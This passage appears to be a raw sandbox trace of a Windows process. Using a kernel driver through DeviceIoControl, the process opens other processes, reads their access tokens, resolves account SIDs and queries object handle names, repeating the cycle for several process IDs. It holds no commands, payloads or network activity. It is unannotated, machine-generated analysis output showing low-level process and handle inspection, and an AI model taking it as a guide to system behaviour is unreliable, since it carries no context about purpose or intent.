IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0151.827] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0151.827] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0151.829] CloseHandle (hObject=0xc4) returned 1 [0151.830] CloseHandle (hObject=0xc8) returned 1 [0151.830] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0151.830] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0151.830] PsLookupProcessByProcessId (in: ProcessId=0x7c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0151.830] PsAcquireProcessExitSynchronization () returned 0x0 [0151.830] KeStackAttachProcess (in: PROCESS=0xfffffa8002059b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002059b30, ApcState=0xfffff880051635d0) [0151.830] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002056690, HandleInformation=0x0) returned 0x0 [0151.830] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0151.830] PsReleaseProcessExitSynchronization () returned 0x2 [0151.830] ObfDereferenceObject (Object=0xfffffa8002059b30) returned 0x12 [0151.831] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f9f044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f9f044, ReturnLength=0xfffff88005163508) returned 0x0 [0151.831] ObfDereferenceObject (Object=0xfffffa8002056690) returned 0x1 [0151.831] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0151.831] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0151.831] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0151.831] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x78, lpOverlapped=0x0) returned 1 [0151.831] PsLookupProcessByProcessId (in: ProcessId=0x7c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0151.831] PsAcquireProcessExitSynchronization () returned 0x0 [0151.831] KeStackAttachProcess (in: PROCESS=0xfffffa8002059b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002059b30, ApcState=0xfffff880051635d0) [0151.831] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800205f070, HandleInformation=0x0) returned 0x0 [0151.831] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0151.831] PsReleaseProcessExitSynchronization () returned 0x2 [0151.832] ObfDereferenceObject (Object=0xfffffa8002059b30) returned 0x12 [0151.832] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030b07c4, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030b07c4, ReturnLength=0xfffff88005163508) returned 0x0 [0151.832] ObfDereferenceObject (Object=0xfffffa800205f070) returned 0x1 [0151.832] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0151.832] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0151.832] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0151.832] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0151.832] PsLookupProcessByProcessId (in: ProcessId=0x7c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0151.832] PsAcquireProcessExitSynchronization () returned 0x0 [0151.832] KeStackAttachProcess (in: PROCESS=0xfffffa8002059b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002059b30, ApcState=0xfffff880051635d0) [0151.832] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0151.832] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0151.832] PsReleaseProcessExitSynchronization () returned 0x2 [0151.833] ObfDereferenceObject (Object=0xfffffa8002059b30) returned 0x12 [0151.833] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8002ef0044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002ef0044, ReturnLength=0xfffff88005163550) returned 0x0 [0151.833] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x52 [0151.833] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0151.833] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0151.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x788) returned 0xc8 [0151.833] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0151.833] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa800205f1d0, HandleInformation=0x0) returned 0x0 [0151.833] ObOpenObjectByPointer (in: Object=0xfffffa800205f1d0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff8000087c) returned 0x0 [0151.833] ObfDereferenceObject (Object=0xfffffa800205f1d0) returned 0x14 [0151.833] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000087c, DesiredAccess=0x8, TokenHandle=0xfffffa8002669100 | out: TokenHandle=0xfffffa8002669100*=0xc4) returned 0x0 [0151.834] ZwClose (Handle=0xffffffff8000087c) returned 0x0 [0151.834] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0151.834] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0151.834] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0151.836] CloseHandle (hObject=0xc4) returned 1 [0151.836] CloseHandle (hObject=0xc8) returned 1 [0151.837] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0151.837] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0151.837] PsLookupProcessByProcessId (in: ProcessId=0x788, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0151.837] PsAcquireProcessExitSynchronization () returned 0x0 [0151.837] KeStackAttachProcess (in: PROCESS=0xfffffa800205f1d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800205f1d0, ApcState=0xfffff880051635d0) [0151.837] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020648d0, HandleInformation=0x0) returned 0x0 [0151.837] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0151.837] PsReleaseProcessExitSynchronization () returned 0x2 [0151.837] ObfDereferenceObject (Object=0xfffffa800205f1d0) returned 0x12 [0151.837] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800300b044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800300b044, ReturnLength=0xfffff88005163508) returned 0x0 [0151.837] ObfDereferenceObject (Object=0xfffffa80020648d0) returned 0x1 [0151.837] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0151.838] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0151.838] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0151.838] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0151.838] PsLookupProcessByProcessId (in: ProcessId=0x788, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0151.838] PsAcquireProcessExitSynchronization () returned 0x0 [0151.838] KeStackAttachProcess (in: PROCESS=0xfffffa800205f1d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800205f1d0, ApcState=0xfffff880051635d0) [0151.838] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002064a20, HandleInformation=0x0) returned 0x0 [0151.838] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0151.838] PsReleaseProcessExitSynchronization () returned 0x2 [0151.838] ObfDereferenceObject (Object=0xfffffa800205f1d0) returned 0x12 [0151.838] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003008044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8003008044, ReturnLength=0xfffff88005163508) returned 0x0 [0151.838] ObfDereferenceObject (Object=0xfffffa8002064a20) returned 0x1 [0151.839] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0151.839] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0151.839] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0151.839] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0151.839] PsLookupProcessByProcessId (in: ProcessId=0x788, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0151.839] PsAcquireProcessExitSynchronization () returned 0x0 [0151.839] KeStackAttachProcess (in: PROCESS=0xfffffa800205f1d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800205f1d0, ApcState=0xfffff880051635d0) [0151.839] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0151.839] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0151.839] PsReleaseProcessExitSynchronization () returned 0x2 [0151.839] ObfDereferenceObject (Object=0xfffffa800205f1d0) returned 0x12 [0151.840] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003007044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003007044, ReturnLength=0xfffff88005163550) returned 0x0 [0151.840] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x52 [0151.840] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0151.840] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0151.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x484) returned 0xc8 [0151.840] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0151.840] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa800206e920, HandleInformation=0x0) returned 0x0 [0151.840] ObOpenObjectByPointer (in: Object=0xfffffa800206e920, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff8000087c) returned 0x0 [0151.840] ObfDereferenceObject (Object=0xfffffa800206e920) returned 0x14 [0151.840] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000087c, DesiredAccess=0x8, TokenHandle=0xfffffa8002669100 | out: TokenHandle=0xfffffa8002669100*=0xc4) returned 0x0 [0151.840] ZwClose (Handle=0xffffffff8000087c) returned 0x0 [0151.840] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0151.841] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0151.841] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0151.843] CloseHandle (hObject=0xc4) returned 1 [0151.843] CloseHandle (hObject=0xc8) returned 1 [0151.843] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0151.843] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0151.843] PsLookupProcessByProcessId (in: ProcessId=0x484, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0151.843] PsAcquireProcessExitSynchronization () returned 0x0 [0151.843] KeStackAttachProcess (in: PROCESS=0xfffffa800206e920, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800206e920, ApcState=0xfffff880051635d0) [0151.843] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800206dcb0, HandleInformation=0x0) returned 0x0 [0151.843] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0151.844] PsReleaseProcessExitSynchronization () returned 0x2 [0151.844] ObfDereferenceObject (Object=0xfffffa800206e920) returned 0x12 [0151.844] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fff044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fff044, ReturnLength=0xfffff88005163508) returned 0x0 [0151.844] ObfDereferenceObject (Object=0xfffffa800206dcb0) returned 0x1 [0151.844] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0151.844] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0151.844] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0151.844] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x7a, lpOverlapped=0x0) returned 1 [0151.844] PsLookupProcessByProcessId (in: ProcessId=0x484, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0151.844] PsAcquireProcessExitSynchronization () returned 0x0 [0151.844] KeStackAttachProcess (in: PROCESS=0xfffffa800206e920, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800206e920, ApcState=0xfffff880051635d0) [0151.844] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800206d8c0, HandleInformation=0x0) returned 0x0 [0151.844] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0151.844] PsReleaseProcessExitSynchronization () returned 0x2 [0151.844] ObfDereferenceObject (Object=0xfffffa800206e920) returned 0x12 [0151.844] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ffe044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ffe044, ReturnLength=0xfffff88005163508) returned 0x0 [0151.844] ObfDereferenceObject (Object=0xfffffa800206d8c0) returned 0x1 [0151.844] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0151.844] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0151.844] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0151.845] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0151.845] PsLookupProcessByProcessId (in: ProcessId=0x484, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0151.845] PsAcquireProcessExitSynchronization () returned 0x0 [0151.845] KeStackAttachProcess (in: PROCESS=0xfffffa800206e920, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800206e920, ApcState=0xfffff880051635d0) [0151.845] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0151.845] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0151.845] PsReleaseProcessExitSynchronization () returned 0x2 [0151.845] ObfDereferenceObject (Object=0xfffffa800206e920) returned 0x12 [0151.845] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8002ff3044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002ff3044, ReturnLength=0xfffff88005163550) returned 0x0 [0151.845] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x52 [0151.845] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0151.845] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0151.845] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x138) returned 0xc8 [0151.845] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0151.845] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8001f23b30, HandleInformation=0x0) returned 0x0 [0151.845] ObOpenObjectByPointer (in: Object=0xfffffa8001f23b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff8000087c) returned 0x0 [0151.846] ObfDereferenceObject (Object=0xfffffa8001f23b30) returned 0x14 [0151.846] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000087c, DesiredAccess=0x8, TokenHandle=0xfffffa8002669100 | out: TokenHandle=0xfffffa8002669100*=0xc4) returned 0x0 [0151.846] ZwClose (Handle=0xffffffff8000087c) returned 0x0 [0151.846] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0151.846] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0151.846] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0151.893] CloseHandle (hObject=0xc4) returned 1 [0151.893] CloseHandle (hObject=0xc8) returned 1 [0151.893] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0151.893] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0151.893] PsLookupProcessByProcessId (in: ProcessId=0x138, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0151.894] PsAcquireProcessExitSynchronization () returned 0x0 [0151.894] KeStackAttachProcess (in: PROCESS=0xfffffa8001f23b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f23b30, ApcState=0xfffff880051635d0) [0151.894] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f61650, HandleInformation=0x0) returned 0x0 [0151.894] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0151.894] PsReleaseProcessExitSynchronization () returned 0x2 [0151.894] ObfDereferenceObject (Object=0xfffffa8001f23b30) returned 0x12 [0151.894] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030a2044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030a2044, ReturnLength=0xfffff88005163508) returned 0x0 [0151.894] ObfDereferenceObject (Object=0xfffffa8001f61650) returned 0x1 [0151.894] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0151.895] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0151.895] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0151.895] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x84, lpOverlapped=0x0) returned 1 [0151.895] PsLookupProcessByProcessId (in: ProcessId=0x138, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0151.895] PsAcquireProcessExitSynchronization () returned 0x0 [0151.895] KeStackAttachProcess (in: PROCESS=0xfffffa8001f23b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001f23b30, ApcState=0xfffff880051635d0) [0151.896] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f61850, HandleInformation=0x0) returned 0x0 [0151.896] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0151.896] PsReleaseProcessExitSynchronization () returned 0x2 [0151.896] ObfDereferenceObject (Object=0xfffffa8001f23b30) returned 0x12 [0151.896] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030a3044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030a3044, ReturnLength=0xfffff88005163508) returned 0x0 [0151.896] ObfDereferenceObject (Object=0xfffffa8001f61850) returned 0x1 [0151.896] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0151.896] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0151.896] RtlAllocateHeap (HeapHandle=0x290000, 